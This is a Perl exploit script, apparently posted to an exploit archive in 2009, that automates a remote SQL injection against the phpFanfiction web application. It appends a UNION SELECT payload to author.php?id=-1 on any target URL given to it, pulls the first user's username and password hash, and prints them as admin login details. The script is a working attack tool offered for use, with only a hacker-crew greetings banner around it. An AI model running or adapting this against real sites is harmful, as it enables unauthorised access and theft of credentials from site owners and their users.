phpfanfictionsploit-sql.txt
Posted on 29 June 2009
#!/usr/bin/perl #**********************************************************# #phpFanfiction [Remote SQL injection] #**********************************************************# #Greetz #www.MainHack.com - www.ServerIsDown.org - www.sux0r.net #VOP Crew [Vaksin13 * OoN_Boy * Paman] #R3VAN_BASTARD * Kecemplungkalen * eminem * [S]hiro * #zxvf * Pizzyroot * iwannine #Jupe Crew [makasih buat ngenet gratisnya wkwkwk] #*********************************************************# use HTTP::Request; use LWP::UserAgent; $bug = "author.php?id=-1"; $sql = "+union+select+1,2,3,4,concat(0x21,user_name,0x3a,user_password,0x21),6,7 from+user+where+user_id=1--"; print " ************************************************ "; print " * phpFanfiction [Remote SQL injection] * "; print " * disclosure by S3T4N * "; print " * sux0r.net * "; print " ************************************************ "; if (@ARGV != 1) { &help; exit(); } sub help(){ print " [?] Use : perl $0 www.target.com "; print " perl $0 www.target.com/path "; } if ($ARGV[0] =~ /http:/// ) { $target = $ARGV[0]."/"; } else { $target = "http://".$ARGV[0]."/"; } print " [SQL] Exploiting ... "; my $injection = $target.$bug.$sql; my $request = HTTP::Request->new(GET=>$injection); my $useragent = LWP::UserAgent->new(); $useragent->timeout(10); my $response = $useragent->request($request); if ($response->is_success) { my $res = $response->content; if ($res =~ m/!(.*):(.*)!/g) { my ($username,$passwd) = ($1,$2); print " [target] $target "; print " [loginx] $username:$passwd "; } else { print " [SQL] Error, Fail to get admin login. "; } } else { print " [SQL] Error, ".$response->status_line." "; }
